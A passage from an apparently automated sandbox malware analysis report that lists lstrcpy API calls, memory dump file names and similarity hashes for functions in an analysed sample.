                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 5387ddccc4593ada97eacc63b0ecaebdbba700c15543c42ef7d22a0cf2252024
                                • Instruction ID: d5ba9a56cb7be727e1e0713fefbcff3930d2582086a911a59274e328a83e4b15
                                • Opcode Fuzzy Hash: 5387ddccc4593ada97eacc63b0ecaebdbba700c15543c42ef7d22a0cf2252024
                                • Instruction Fuzzy Hash: 8731D674A01B06EFCB28DF3AD588966BBE5BF48714704492DE996C3B20DB74F851DB80
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00FF162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1693
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 488ebe9569e7d46ca20e274dc56c94e621409cacc1dec84afb1c841aab2f2b78
                                • Instruction ID: c4726a9ee6d579fc3eb78569bfd2002fe0e57640b16b08398ba8ad9ef886f9f1
                                • Opcode Fuzzy Hash: 488ebe9569e7d46ca20e274dc56c94e621409cacc1dec84afb1c841aab2f2b78
                                • Instruction Fuzzy Hash: 60114C74A11B06ABCB349F36D45C936B7F8BF44711B08052DE98AC7A50EB34E841DB90